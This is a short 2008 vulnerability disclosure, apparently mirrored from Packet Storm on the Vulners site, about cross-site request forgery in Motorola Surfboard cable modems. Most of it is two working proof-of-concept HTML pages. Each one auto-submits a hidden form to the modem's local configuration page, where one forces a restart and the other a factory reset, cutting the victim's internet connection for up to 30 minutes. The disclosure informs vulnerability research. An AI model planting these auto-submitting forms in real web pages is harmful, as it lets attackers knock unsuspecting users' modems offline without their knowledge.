Lucene search
K

motsurf-csrf.txt

🗓️ 21 Apr 2008 00:00:00Reported by Michael BrooksType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 30 Views

Motorola Surfboard Cable Modems suffer from Denial of Service attacks through Cross Site Request Forgery, causing lengthy internet disconnections

Code
`More information about this flaw can be found here:  
http://www.rooksecurity.com/blog/?p=4  
  
Motorola Surfboard Cable Modems suffer from two Denial of Service attacks by means of Cross Site Request Forgery.  
  
The latest version of The Motorola Surfboard is affected at the time of the writing.  
  
Restarts the modem:  
<html>  
<form id=1 method=post action=’http://192.168.100.1/configdata.html’>  
<input name=’BUTTON_INPUT’ value=’Restart+Cable+Modem’>  
</form>  
<html>  
<script>  
document.getElementById(1).submit();  
</script>  
  
This CSRF will disconnect the user from the internet for longer.  
“The process to get back online from a factory default condition could take from 5 to 30 minutes.”  
<html>  
<form id=2 method=post action=’http://192.168.100.1/configdata.html’>  
<input name=’BUTTON_INPUT’ value=’Reset+All+Defaults’>  
</form>  
<html>  
<script>  
document.getElementById(2).submit();  
</script>  
  
  
Peace  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation